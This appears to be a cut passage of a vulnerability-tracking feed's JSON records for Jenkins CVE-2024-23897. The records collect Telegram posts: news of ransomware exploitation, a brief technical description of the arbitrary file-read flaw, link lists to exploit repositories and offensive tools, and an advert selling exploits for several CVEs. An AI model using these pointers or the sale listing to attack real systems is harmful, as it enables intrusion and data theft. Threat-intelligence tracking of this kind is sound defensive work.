APT-\u043e\u0442\u0447\u0451\u0442\u044b.\n\n1\ufe0f\u20e3 \u041a\u0440\u0438\u043f\u0442\u043e\u043c\u0430\u0439\u043d\u0438\u043d\u0433\u043e\u0432\u044b\u0435 \u043a\u0430\u043c\u043f\u0430\u043d\u0438\u0438 \u0432\u0441\u0451 \u043c\u043d\u043e\u0436\u0430\u0442\u0441\u044f. Commando Cat \u0430\u0442\u0430\u043a\u0443\u0435\u0442 \u0443\u044f\u0437\u0432\u0438\u043c\u044b\u0435 \u0441\u0435\u0440\u0432\u0435\u0440\u044b Docker, HeadCrab 2.0 \u0446\u0435\u043b\u0438\u0442\u0441\u044f \u0432 \u0441\u0435\u0440\u0432\u0435\u0440\u044b Redis.\n\n\ud83d\udcac \u0410\u043d\u0430\u043b\u0438\u0437 USB-\u0438\u043c\u043f\u043b\u0430\u043d\u0442\u0430 \u043e\u0442  UNC4990,  \u0444\u0438\u043d\u0430\u043d\u0441\u043e\u0432\u043e \u043c\u043e\u0442\u0438\u0432\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u043e\u0439 \u0433\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u0438, \u043f\u0440\u0435\u0438\u043c\u0443\u0449\u0435\u0441\u0442\u0432\u0435\u043d\u043d\u043e \u043e\u0440\u0443\u0434\u0443\u044e\u0449\u0435\u0439 \u0432 \u0415\u0432\u0440\u043e\u043f\u0435.\n\n\ud83d\udfe1 \u0410 \u0432 \u0420\u043e\u0441\u0441\u0438\u0438 \u0444\u0438\u0448\u0438\u043d\u0433 \u0438 \u0438\u043d\u0444\u043e\u0441\u0442\u0438\u043b\u0435\u0440\u044b \u043f\u0440\u0438\u043c\u0435\u043d\u044f\u044e\u0442\u0441\u044f \u0434\u043b\u044f \u0430\u0442\u0430\u043a \u043d\u0430 \u043f\u0440\u043e\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u044b\u0435 \u043e\u0440\u0433\u0430\u043d\u0438\u0437\u0430\u0446\u0438\u0438 \u0433\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u043e\u0439 Scaly Wolf.\n\n\u0421\u0443\u0434\u044f \u043f\u043e \u0442\u0440\u0435\u0432\u043e\u0436\u043d\u044b\u043c \u0440\u0435\u043b\u044f\u0446\u0438\u044f\u043c UA-CERT, \u0412\u041f\u041e PurpleFOX/DirtyMoe, \u0440\u0430\u043d\u0435\u0435 \u0437\u0430\u043c\u0435\u0447\u0435\u043d\u043d\u043e\u0435 \u043f\u0440\u0435\u0438\u043c\u0443\u0449\u0435\u0441\u0442\u0432\u0435\u043d\u043d\u043e \u0432 \u041a\u0438\u0442\u0430\u0435, \u043d\u0430\u0447\u0430\u043b\u043e \u043f\u043e\u0431\u0435\u0434\u043d\u043e\u0435 \u0448\u0435\u0441\u0442\u0432\u0438\u0435 \u043f\u043e \u0434\u0440\u0443\u0433\u0438\u043c \u0447\u0430\u0441\u0442\u044f\u043c \u043a\u043e\u043d\u0442\u0438\u043d\u0435\u043d\u0442\u0430. \u042d\u0442\u043e \u043d\u0435\u043c\u043e\u043b\u043e\u0434\u043e\u0439, \u043d\u043e \u0440\u0435\u0433\u0443\u043b\u044f\u0440\u043d\u043e \u043e\u0431\u043d\u043e\u0432\u043b\u044f\u0435\u043c\u044b\u0439 \u043a\u043e\u043c\u043f\u043e\u043d\u0435\u043d\u0442 \u043a\u043e\u043c\u043c\u0435\u0440\u0447\u0435\u0441\u043a\u043e\u0433\u043e \u0431\u043e\u0442\u043d\u0435\u0442\u0430, \u0438\u043c\u0435\u044e\u0449\u0438\u0439 \u0444\u0443\u043d\u043a\u0446\u0438\u0438 \u0440\u0443\u0442\u043a\u0438\u0442\u0430 \u0438 \u0441\u0430\u043c\u043e\u0440\u0430\u0441\u043f\u0440\u043e\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0438\u044f. \u042d\u0432\u043e\u043b\u044e\u0446\u0438\u044f \u0412\u041f\u041e \u043d\u0435\u043f\u043b\u043e\u0445\u043e \u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u0430 (1, 2, 3).\n\n\ud83d\uddc4 \u0421\u0435\u0440\u0432\u0435\u0440\u043d\u044b\u0439 P2P-\u0431\u043e\u0442\u043d\u0435\u0442 FritzFrog, \u0440\u0430\u043d\u0435\u0435 \u0440\u0430\u0437\u043c\u043d\u043e\u0436\u0430\u0432\u0448\u0438\u0439\u0441\u044f \u0432 \u043e\u0441\u043d\u043e\u0432\u043d\u043e\u043c \u0431\u0440\u0443\u0442\u0444\u043e\u0440\u0441\u043e\u043c SSH, \u043e\u0431\u043d\u043e\u0432\u0438\u043b\u0441\u044f \u0438 \u0441\u0442\u0430\u043b \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u043e\u0432\u0430\u0442\u044c Log4shell.\n\n#\u0434\u0430\u0439\u0434\u0436\u0435\u0441\u0442 #APT @\u041f2\u0422", "creation_timestamp": "2024-02-05T09:10:19.000000Z"}, {"uuid": "63cb75f7-fc33-460b-8739-2147a977afb0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23897", "type": "published-proof-of-concept", "source": "Telegram/GlIK7p0AxYfH_ClRdP-95xtUcrGd3pmGAzf6DhkGyndPPQ", "content": "", "creation_timestamp": "2025-03-07T21:33:32.000000Z"}, {"uuid": "6fbb6405-dca2-4a9f-bbc6-a980eb413dd3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23897", "type": "published-proof-of-concept", "source": "Telegram/xCCT_69L_Cget6vcC_B2Ds7RnKR8UK4HV13Vd9mVZwKFIw", "content": "", "creation_timestamp": "2024-02-25T14:36:25.000000Z"}, {"uuid": "b32e1c1b-c0b1-4bdd-a802-626b362a3a42", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23897", "type": "published-proof-of-concept", "source": "Telegram/HuZ9X3tfOSlNPN4oovI8QTpxhgMqKak2zMA3GUjaQ47oDQ", "content": "", "creation_timestamp": "2024-02-07T11:02:40.000000Z"}, {"uuid": "80522071-0c1e-47ef-bcd3-2a422f1d8d9e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23897", "type": "published-proof-of-concept", "source": "Telegram/jWTWeRFVEnqqj5gOZnknt7T9e8Vn6EbQGcdcN1vemZZdiQ", "content": "", "creation_timestamp": "2024-02-07T11:00:40.000000Z"}, {"uuid": "9b945cc8-e6c1-48ca-9151-3b092bcb9d60", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23897", "type": "published-proof-of-concept", "source": "Telegram/L0GpyDEt78qpZB2Gn5ybLYf45UkLH56aHeOhr4zJPBkE9Q", "content": "", "creation_timestamp": "2024-02-06T03:04:35.000000Z"}, {"uuid": "03c6471b-e43f-45fc-a76c-9c19de3fe6f6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23897", "type": "published-proof-of-concept", "source": "Telegram/DVHDfNsF59PX0CY3WXfPPRj1WVErEXPX3PkQiZZcLwNLGg", "content": "", "creation_timestamp": "2025-03-07T21:33:25.000000Z"}, {"uuid": "aaf935f8-d60b-428a-8e16-84b77b624394", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23897", "type": "published-proof-of-concept", "source": "https://t.me/HackingInsights/9977", "content": "\u200aRansomEXX Group Exploits Jenkins Vulnerability (CVE-2024-23897) in Major Indian Banking Attack\n\nhttps://securityonline.info/ransomexx-group-exploits-jenkins-vulnerability-cve-2024-23897-in-major-indian-banking-attack/", "creation_timestamp": "2024-08-15T16:00:56.000000Z"}, {"uuid": "7c09c452-1d85-4641-8703-4229c2ff7244", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23897", "type": "seen", "source": "https://t.me/Hunt3rkill3rs1/53", "content": "\u041c\u044b \u043f\u0440\u043e\u0434\u0430\u0435\u043c \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0438\u0435 \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u044b:\n\n+ Windows LPE (CVE-2024-26169), March 2024\n\n+ Microsoft Outlook RCE (CVE-2024-21413) - private and upgraded version (added suport for unauthenticated SMTP servers)\n\n+ GlobalProtect RCE (CVE-2024-3400)\n\n+ Fortinet FortiOS RCE (CVE-2024-21762)\n\n+ ScreenConnect RCE (CVE-2024-1709)\n\n+ Ivanti Exploit (CVE-2024-21893)\n\n+ Jenkins Exploit (CVE-2024-23897)\n\n+ JetBrains RCE (CVE-2024-27198)", "creation_timestamp": "2024-05-02T02:29:37.000000Z"}, {"uuid": "41e9b194-1a05-4d10-999c-da1d49fd9def", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23897", "type": "published-proof-of-concept", "source": "Telegram/4FONN52HgzmsSmmdEMhCgKcSfVBLwKfXSnZ97-zmA2ZW5Q", "content": "", "creation_timestamp": "2024-01-27T03:14:31.000000Z"}, {"uuid": "16dfc00c-9503-4ecf-b2cc-867569fd2f37", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23897", "type": "published-proof-of-concept", "source": "Telegram/5EgSgCPGM5uAoqIFnSvS-3MgoOXAjmvPg-efBu0Jy63trQ", "content": "", "creation_timestamp": "2024-01-26T18:50:38.000000Z"}, {"uuid": "7e59687e-3017-4753-aa51-92be417448d5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23897", "type": "published-proof-of-concept", "source": "Telegram/Yrtjz7h9QoLsTC-1fIVYkuNJaPRL4dzzxdkDwZBUDg1BBQ", "content": "", "creation_timestamp": "2024-02-26T17:40:21.000000Z"}, {"uuid": "a2475677-d6d3-4d52-a862-7be70121e002", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23897", "type": "published-proof-of-concept", "source": "Telegram/Wqyq-cmWlXFADcKRAbn6trpLkIlb_d9-ld4u8Dxzr4G5gQ", "content": "", "creation_timestamp": "2024-02-26T17:30:37.000000Z"}, {"uuid": "1025da6f-518e-422f-8ba1-34360511f11b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23897", "type": "exploited", "source": "https://t.me/tengkorakcybercrewz/18238", "content": "The Hacker News\nCISA Warns of Critical Jenkins Vulnerability Exploited in Ransomware Attacks\n\nThe U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added a critical security flaw impacting Jenkins to its Known Exploited Vulnerabilities (KEV) catalog, following its exploitation in ransomware attacks.\nThe vulnerability, tracked as CVE-2024-23897 (CVSS score: 9.8), is a path traversal flaw that could lead to code execution.\n\"Jenkins Command Line Interface (CLI) contains a", "creation_timestamp": "2024-08-20T09:33:53.000000Z"}, {"uuid": "8d568f9c-5afd-4db0-9358-713ed0c5230c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23897", "type": "seen", "source": "Telegram/E3iST3lZwZOutaoSgFfuoZ6eFjpwUIDeSKbyxLV2xONR5Q", "content": "", "creation_timestamp": "2024-05-02T02:23:05.000000Z"}, {"uuid": "795f1eca-52bc-430b-b2b7-7ccba06753bd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23897", "type": "published-proof-of-concept", "source": "https://t.me/blackcybersec/62", "content": "https://github.com/ThatNotEasy/CVE-2024-23897\n\n- This repository contains a Python script that exploits a critical vulnerability (CVE-2024-23897) in Jenkins, leading to arbitrary file read and remote code execution (RCE). This vulnerability allows an unauthenticated attacker to execute arbitrary commands on the target Jenkins server, potentially compromising the entire system.", "creation_timestamp": "2024-07-29T03:33:29.000000Z"}, {"uuid": "69ae4583-db86-4144-b6f2-4f91a135cd29", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23897", "type": "published-proof-of-concept", "source": "Telegram/wLe9FrhP02e3V8b74wZC_EgtZgJw44We0feGoLnlF9QrdajO", "content": "", "creation_timestamp": "2024-08-20T19:15:05.000000Z"}, {"uuid": "4d574a21-f035-4df4-946b-f1186189c4b6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23897", "type": "published-proof-of-concept", "source": "https://t.me/AGENTZSECURITY/1251", "content": "https://github.com/SirAppSec/nuclei-template-generator-log4j\nhttps://github.com/Str1am/my-nuclei-templates\nhttps://github.com/SumedhDawadi/Custom-Nuclei-Template\nhttps://github.com/SumedhDawadi/Nuclei_Template_Subdomain_Takeover\nhttps://github.com/System00-Security/backflow\nhttps://github.com/T4t4ru/nuclei-templates\nhttps://github.com/Tykerdestroy/Bug-bounty-custom-templates\nhttps://github.com/UnaPibaGeek/honeypots-detection\nhttps://github.com/V0idC0de/dir-listing-iis-test\nhttps://github.com/VulnExpo/nuclei-templates\nhttps://github.com/W01fh4cker/nucleiTemplatesClassifier\nhttps://github.com/YashVardhanTrip/nuclei-templates\nhttps://github.com/adampielak/nuclei-templates\nhttps://github.com/aels/CVE-2022-37042\nhttps://github.com/ahmedalroky/nuclei-templates\nhttps://github.com/akincibor/CVE-2022-27925\nhttps://github.com/al4xs/nuclei-templates\nhttps://github.com/alexrydzak/rydzak-nuclei-templates\nhttps://github.com/am0nt31r0/custom-nuclei-templates\nhttps://github.com/anmolksachan/nuclei-templates\nhttps://github.com/attacker-codeninja/My-Nuclei-Templates-2\nhttps://github.com/ayadim/Nuclei-bug-hunter\nhttps://github.com/b4dboy17/badboy_17-Nuclei-Templates-Collection\nhttps://github.com/badboy-sft/badboy_17-Nuclei-Templates-Collection\nhttps://github.com/badboycxcc/CVE-2023-24100\nhttps://github.com/baharebenesbordi/Nuclei-Templates\nhttps://github.com/bhataasim1/PersonalTemplates\nhttps://github.com/binod235/nuclei-templates-and-reports\nhttps://github.com/bjhulst/nuclei-custom-templates\nhttps://github.com/blazeinfosec/nuclei-templates\nhttps://github.com/boobooHQ/private_templates\nhttps://github.com/brinhosa/brinhosa-nuclei-templates\nhttps://github.com/bufferbandit/gitScanNucleiTemplate\nhttps://github.com/bugbountydude/Nuclei-TamplatesBackup\nhttps://github.com/c-sh0/nuclei_templates\nhttps://github.com/c3l3si4n/malicious_nuclei_templates\nhttps://github.com/chouaibhm/foulenzer-templates\nhttps://github.com/cipher387/juicyinfo-nuclei-templates\nhttps://github.com/clarkvoss/Nuclei-Templates\nhttps://github.com/coldrainh/nuclei-ByMyself\nhttps://github.com/compr00t/nuclei-templates\nhttps://github.com/d3sca/Nuclei_Templates\nhttps://github.com/daffainfo/my-nuclei-templates\nhttps://github.com/damon-sec/Nuclei-templates-Collection\nhttps://github.com/damon-sec/TCSZ-Nuclei\nhttps://github.com/dk4trin/templates-nuclei\nhttps://github.com/drfabiocastro/certwatcher-templates\nhttps://github.com/e1abrador/SpringCorePoC.sh\nhttps://github.com/ed-red/redmc_custom_templates_nuclei\nhttps://github.com/ekinsb/Nuclei-Templates\nhttps://github.com/emadshanab/nucleiDB\nhttps://github.com/erickfernandox/nuclei-templates\nhttps://github.com/esetal/nuclei-bb-templates\nhttps://github.com/ethicalhackingplayground/erebus-templates\nhttps://github.com/fostane/my-nuclei-templates-1\nhttps://github.com/geeknik/nuclei-templates-1\nhttps://github.com/geeknik/the-nuclei-templates\nhttps://github.com/glyptho/templatesallnuclei\nhttps://github.com/h4ndsh/nuclei-templates\nhttps://github.com/ibaiw/nuclei_templates\nhttps://github.com/im403/nuclei-temp\nhttps://github.com/imhunterand/nuclei-custom-templates\nhttps://github.com/javaongsan/nuclei-templates\nhttps://github.com/justmumu/SpringShell\nhttps://github.com/k00kx/nuclei-templates\nhttps://github.com/kaanatmacaa/CVE-2024-23897\nhttps://github.com/kabilan1290/templates\nhttps://github.com/kernel-krunch/nuclei-templates\nhttps://github.com/kh4sh3i/CVE-2022-23131\nhttps://github.com/kh4sh3i/Nextcloud-Pentesting\nhttps://github.com/kh4sh3i/Webmin-CVE\nhttps://github.com/learnerboy88/CVE-2023-29489\nhttps://github.com/lliwi/nuclei-repo-hunter\nhttps://github.com/luck-ying/Library-YAML-POC\nhttps://github.com/manasmbellani/nuclei-templates\nhttps://github.com/marcositu/nuclei-custom-templates\nhttps://github.com/mastersir-lab/nuclei-yaml-poc\nhttps://github.com/mbskter/Masscan2Httpx2Nuclei-Xray", "creation_timestamp": "2025-04-22T02:52:21.000000Z"}, {"uuid": "eebf99cc-0dda-4c93-83ac-32c270606772", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23897", "type": "seen", "source": "Telegram/yoNNgIU2JU4zwFL5vXqVgP00V9P0beeHjRLaro8CHcaWRn8", "content": "", "creation_timestamp": "2024-05-02T02:23:04.000000Z"}, {"uuid": "8808f5d7-7eb5-406b-9831-a86fd874d65b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23897", "type": "seen", "source": "https://t.me/arpsyndicate/3079", "content": "#ExploitObserverAlert\n\nCVE-2024-23897\n\nDESCRIPTION: Exploit Observer has 6 entries in 5 file formats related to CVE-2024-23897. Jenkins 2.441 and earlier, LTS 2.426.2 and earlier does not disable a feature of its CLI command parser that replaces an '@' character followed by a file path in an argument with the file's contents, allowing unauthenticated attackers to read arbitrary files on the Jenkins controller file system.", "creation_timestamp": "2024-01-26T21:34:49.000000Z"}, {"uuid": "95402893-f912-4ef8-8b1f-06767f2c91c3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23897", "type": "published-proof-of-concept", "source": "https://t.me/CyberDilara/138", "content": "Tools - Hackers Factory \n\nPoC for a SMS-based shell. Send commands and receive responses over SMS from mobile broadband capable computers\n\nhttps://github.com/persistent-security/SMShell\n\nLinux anti-debugging and anti-analysis rust library\n\nhttps://github.com/0xor0ne/debugoff\n\nNuclei template for CVE-2024-23897 (Jenkins LFI Vulnerability)\n\nhttps://github.com/kaanatmacaa/CVE-2024-23897\n\nCVE-2023-4427\n\nhttps://github.com/tianstcht/CVE-2023-4427\n\nDisable Windows Defender (+ UAC Bypass, + Upgrade to SYSTEM)\n\nhttps://github.com/EvilGreys/Disable-Windows-Defender-\n\nA repo for TPM sniffing greatness\n\nhttps://github.com/NoobieDog/TPM-Sniffing\n\nSmall toolkit for extracting information and dumping sensitive strings from Windows processes\n\nhttps://github.com/mlcsec/proctools\n\nSecretPixel is a cutting-edge steganography tool designed to securely conceal sensitive information within images. It stands out in the realm of digital steganography by combining advanced encryption, compression, and a seeded Least Significant Bit (LSB) technique to provide a robust solution for embedding data undetectably.\n\nhttps://github.com/x011/SecretPixel\n\nSmall toolkit for extracting information and dumping sensitive strings from Windows processes\n\nhttps://github.com/mlcsec/proctools\n\nThe code that wasn\u2019t there: Reading memory on an Android device by accident\n\nhttps://github.blog/2023-02-23-the-code-that-wasnt-there-reading-memory-on-an-android-device-by-accident/\n\n#HackersFactory", "creation_timestamp": "2024-06-17T13:55:39.000000Z"}, {"uuid": "a9748c8b-e6e5-4ccc-86ad-239a2b999096", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23897", "type": "published-proof-of-concept", "source": "Telegram/UHl3JdTiAek1kNgtneg2xKR-NV1ko1nWx4c9k_UcKWbc_Q", "content": "", "creation_timestamp": "2024-01-25T14:20:45.000000Z"}, {"uuid": "f58f118c-09f2-4a52-831b-1d354e376305", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23897", "type": "exploited", "source": "Telegram/XOfYrLLFg-lwYq7qyguaSgYAJIvrTR1GifnIoqj4eH2QfQ", "content": "", "creation_timestamp": "2024-08-20T09:51:19.000000Z"}, {"uuid": "87bd9680-1573-4aad-8206-ee6b8e9f80a9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23897", "type": "published-proof-of-concept", "source": "https://t.me/CyberDilara/143", "content": "Tools - Hackers Factory \n\nLinux anti-debugging and anti-analysis rust library\n\nhttps://github.com/0xor0ne/debugoff\n\nRemote buffer overflow over wifi_stack in wpa_supplicant binary in android 11, platform:samsung a20e, stock options so like works out of the box\n\nhttps://github.com/SpiralBL0CK/Remote-buffer-overflow-over-wifi_stack-in-wpa_supplicant-binary-in-android-11-platform-samsung-a20e\n\nNegoexrelayx - Negoex relaying tool\n\nToolkit for abusing Kerberos PKU2U and NegoEx. Requires impacket It is recommended to install impacket from git directly to have the latest version available\n\nhttps://github.com/morRubin/NegoExRelay\n\nMinimal DNS server built in Rust with rule system and logging.\n\nhttps://github.com/sammwyy/mindns\n\nA repository of code signing certificates known to have been leaked or stolen, then abused by threat actors\n\nhttps://github.com/WithSecureLabs/lolcerts\n\nTo audit the security of read-only domain controllers\n\nhttps://github.com/wh0amitz/SharpRODC\n\nCVE-2024-23897\nJenkins CVE-2024-23897: Arbitrary File Read Vulnerability Leading to RCE\n\nhttps://github.com/h4x0r-dz/CVE-2024-23897\n\nCVE-2024-21893: SSRF Vulnerability in Ivanti Connect Secure\n\nhttps://github.com/h4x0r-dz/CVE-2024-21893.py\n\nHTTP Downgrade attacks with SmuggleFuzz\n\nhttps://moopinger.github.io/blog/smugglefuzz/fuzzing/smuggling/2024/01/31/SmuggleFuzz.html\n\nsmugglefuzz : A customizable and rapid HTTP downgrade smuggling scanner written in Go \n\nhttps://github.com/Moopinger/smugglefuzz\n\nRef : http2smugl : tool helps to detect and exploit HTTP request smuggling in cases it can be achieved via HTTP/2 -> HTTP/1.1 conversion by the frontend server\n\nhttps://github.com/neex/http2smugl\n\nAdvanced Time-based Blind SQL Injection fuzzer for HTTP Headers\n\nhttps://github.com/danialhalo/SqliSniper\n\n#HackersFactory", "creation_timestamp": "2024-06-17T13:56:56.000000Z"}, {"uuid": "78aa5a61-822e-4e4d-b1a5-ae6bf6f1dca6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23897", "type": "published-proof-of-concept", "source": "https://t.me/lcmysecteamch/2354", "content": "Tools - Hackers Factory \n\nPoC for a SMS-based shell. Send commands and receive responses over SMS from mobile broadband capable computers\n\nhttps://github.com/persistent-security/SMShell\n\nLinux anti-debugging and anti-analysis rust library\n\nhttps://github.com/0xor0ne/debugoff\n\nNuclei template for CVE-2024-23897 (Jenkins LFI Vulnerability)\n\nhttps://github.com/kaanatmacaa/CVE-2024-23897\n\nCVE-2023-4427\n\nhttps://github.com/tianstcht/CVE-2023-4427\n\nDisable Windows Defender (+ UAC Bypass, + Upgrade to SYSTEM)\n\nhttps://github.com/EvilGreys/Disable-Windows-Defender-\n\nA repo for TPM sniffing greatness\n\nhttps://github.com/NoobieDog/TPM-Sniffing\n\nSmall toolkit for extracting information and dumping sensitive strings from Windows processes\n\nhttps://github.com/mlcsec/proctools\n\nSecretPixel is a cutting-edge steganography tool designed to securely conceal sensitive information within images. It stands out in the realm of digital steganography by combining advanced encryption, compression, and a seeded Least Significant Bit (LSB) technique to provide a robust solution for embedding data undetectably.\n\nhttps://github.com/x011/SecretPixel\n\nSmall toolkit for extracting information and dumping sensitive strings from Windows processes\n\nhttps://github.com/mlcsec/proctools\n\nThe code that wasn\u2019t there: Reading memory on an Android device by accident\n\nhttps://github.blog/2023-02-23-the-code-that-wasnt-there-reading-memory-on-an-android-device-by-accident/\n\n#HackersFactory", "creation_timestamp": "2024-02-12T11:50:19.000000Z"}, {"uuid": "5e7375f4-b624-4ce5-b9bb-20de376a21ce", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23897", "type": "seen", "source": "https://t.me/lostsec/429", "content": "Jenkins CVE-2024-23897 RCE\nNuclei default templates dont gives any result so i just modified the templates with latest one..", "creation_timestamp": "2024-04-24T08:34:22.000000Z"}, {"uuid": "a9c2f9bd-f952-4430-b5e4-2e88f0801d36", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23897", "type": "exploited", "source": "https://t.me/KomunitiSiber/2423", "content": "CISA Warns of Critical Jenkins Vulnerability Exploited in Ransomware Attacks\nhttps://thehackernews.com/2024/08/cisa-warns-of-critical-jenkins.html\n\nThe U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added a critical security flaw impacting Jenkins to its Known Exploited Vulnerabilities (KEV) catalog, following its exploitation in ransomware attacks.\nThe vulnerability, tracked as CVE-2024-23897 (CVSS score: 9.8), is a path traversal flaw that could lead to code execution.\n\"Jenkins Command Line Interface (CLI) contains a", "creation_timestamp": "2024-08-20T07:51:24.000000Z"}, {"uuid": "adc8f100-5859-4afd-8960-27c37e0fcd33", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23897", "type": "exploited", "source": "https://t.me/tengkorakcybercrewz/3641", "content": "The Hacker News\nCISA Warns of Critical Jenkins Vulnerability Exploited in Ransomware Attacks\n\nThe U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added a critical security flaw impacting Jenkins to its Known Exploited Vulnerabilities (KEV) catalog, following its exploitation in ransomware attacks.\nThe vulnerability, tracked as CVE-2024-23897 (CVSS score: 9.8), is a path traversal flaw that could lead to code execution.\n\"Jenkins Command Line Interface (CLI) contains a", "creation_timestamp": "2024-08-20T09:33:53.000000Z"}, {"uuid": "01bf1b45-cc55-4e01-ba94-89e19c4c4839", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23897", "type": "seen", "source": "Telegram/MJSg8Sv1s6244nb3DVYWZm8Rju6lGyMlDeVM6a0Y3fvmnw", "content": "", "creation_timestamp": "2024-05-02T02:23:05.000000Z"}, {"uuid": "9bf1d5aa-133a-426b-a59a-cf2d1ced7551", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23897", "type": "seen", "source": "https://t.me/KomunitiSiber/1396", "content": "Critical Jenkins Vulnerability Exposes Servers to RCE Attacks - Patch ASAP!\nhttps://thehackernews.com/2024/01/critical-jenkins-vulnerability-exposes.html\n\nThe maintainers of the open-source continuous integration/continuous delivery and deployment (CI/CD) automation software Jenkins have resolved nine security flaws, including a critical bug that, if successfully exploited, could result in remote code execution (RCE).\nThe issue, assigned the CVE identifier\u00a0CVE-2024-23897, has been described as an arbitrary file read vulnerability through the", "creation_timestamp": "2024-01-25T15:04:21.000000Z"}, {"uuid": "a257a665-9bab-4cc4-8d5f-6d514aaf740e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23897", "type": "published-proof-of-concept", "source": "https://t.me/dilagrafie/3233", "content": "Tools - Hackers Factory \n\nLinux anti-debugging and anti-analysis rust library\n\nhttps://github.com/0xor0ne/debugoff\n\nRemote buffer overflow over wifi_stack in wpa_supplicant binary in android 11, platform:samsung a20e, stock options so like works out of the box\n\nhttps://github.com/SpiralBL0CK/Remote-buffer-overflow-over-wifi_stack-in-wpa_supplicant-binary-in-android-11-platform-samsung-a20e\n\nNegoexrelayx - Negoex relaying tool\n\nToolkit for abusing Kerberos PKU2U and NegoEx. Requires impacket It is recommended to install impacket from git directly to have the latest version 